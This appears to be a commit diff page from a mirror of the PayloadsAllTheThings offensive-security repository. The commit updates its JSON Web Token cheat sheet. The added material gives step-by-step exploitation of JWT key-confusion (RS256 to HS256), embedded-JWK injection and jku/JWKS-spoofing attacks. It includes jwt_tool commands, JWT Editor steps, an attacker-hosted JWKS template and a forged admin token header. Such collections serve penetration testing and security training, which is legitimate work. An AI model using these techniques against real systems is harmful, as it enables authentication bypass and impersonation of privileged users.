wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-04-27 04:25:01 +02:00
Code Issues Releases Activity

JWT jku and jwks - manual exploitation

This commit is contained in:
Swissky 2023-03-12 18:02:29 +01:00
parent d5729888c3
commit 579207aa8f
1 changed files with 47 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
JSON Web Token/README.md
View File

@ -12,7 +12,7 @@
- [JWT Signature](#jwt-signature)
- [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042)
- [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644)
- [JWT Signature - None algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235)
- [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235)
- [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431)
- [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114)
- [JWT Secret](#jwt-secret)
@ -152,7 +152,7 @@ Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh
```
### JWT Signature - None algorithm (CVE-2015-9235)
### JWT Signature - None Algorithm (CVE-2015-9235)
JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
@ -207,6 +207,17 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
```ps1
python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem
```
* Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json`
2. Load it in the JWT Editor Keys tab, click `New RSA Key`.
3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}`
4. Select the PEM radio button and copy the resulting PEM key.
5. Go to the Decoder tab and Base64-encode the PEM.
6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format.
7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied.
8. Edit the JWT token alg to `HS256` and the data.
9. Click `Sign` and keep the option: `Don't modify header`
* Manually using the following steps to edit an RS256 JWT token into an HS256
1. Convert our public key (key.pem) into HEX with this command.
@ -243,9 +254,14 @@ print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
**Exploit**:
```ps1
python3 jwt_tool.py [JWT_HERE] -X i
```
* Using [ticarpi/jwt_tool]
```ps1
python3 jwt_tool.py [JWT_HERE] -X i
```
* Using [portswigger/JWT Editor](#)
1. Add a `New RSA key`
2. In the JWT's Repeater tab, edit data
3. `Attack` > `Embedded JWK`
**Deconstructed**:
```json
@ -432,17 +448,38 @@ It is sometimes exposed publicly via a standard endpoint:
* `/api/keys`
* `/api/v1/keys`
You should create your own key pair for this attack and host it. It should look like that:
```json
{
"keys": [
{
"kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54",
"kty": "RSA",
"e": "AQAB",
"n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ"
}
]
}
```
**Exploit**:
```ps1
python3 jwt_tool.py JWT_HERE -X s
python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json
```
* Using [ticarpi/jwt_tool]
```ps1
python3 jwt_tool.py JWT_HERE -X s
python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json
```
* Using [portswigger/JWT Editor](#)
1. Generate a new RSA key and host it
2. Edit JWT's data
3. Replace the `kid` header with the one from your JWKS
4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked)
**Deconstructed**:
```json
{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json"}.
{"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}.
{"login":"admin"}.
[Signed with new Private key; Public key exported]
```